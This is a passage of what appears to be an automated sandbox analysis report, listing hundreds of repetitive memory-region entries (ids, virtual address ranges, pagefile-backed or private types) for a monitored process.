19995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20072 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20073 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20074 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20075 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20076 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20077 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20078 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20079 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 20080 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20081 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20082 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20083 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20084 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20085 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20086 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20087 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20088 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20089 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20090 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20091 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20092 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 20093 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20094 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20095 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20096 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20097 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20098 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20099 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20100 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20101 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20102 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20103 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20104 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20105 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20106 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20107 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20108 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20114 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20115 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20116 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20117 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20118 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20119 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20120 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20121 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20122 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20123 start_va = 0x2a0000 end_va 
= 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20124 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20125 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20126 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20127 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20128 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20129 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20130 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20131 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20132 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20134 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20135 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20136 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20137 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20153 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20154 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20155 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20156 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20158 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20159 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20160 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20161 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20162 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 20164 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20165 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20167 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20168 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20169 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20170 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20171 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20172 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20173 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20174 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20176 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 20177 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20178 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20180 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20181 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20182 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20183 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20184 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20205 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20206 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20207 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20208 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20209 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20210 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20211 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20212 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20213 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20214 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20215 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20216 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20217 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20330 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20331 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20332 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20333 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20334 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20335 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20336 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20338 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20339 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20340 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20341 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20342 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20343 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20344 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20346 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20347 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20348 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20349 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20350 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20351 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20352 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20353 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20354 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20355 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20356 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20357 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20358 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20359 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 20360 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20361 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20362 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20399 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20400 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20401 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20402 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20403 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20404 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20405 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20406 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20407 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 20408 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20409 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20410 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20411 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20412 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20413 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20414 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20415 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20416 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20417 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 20418 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 20419 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 20420 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 20421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20422 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20428 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20429 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20430 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20431 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20433 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20435 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20440 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 20446 start_va 
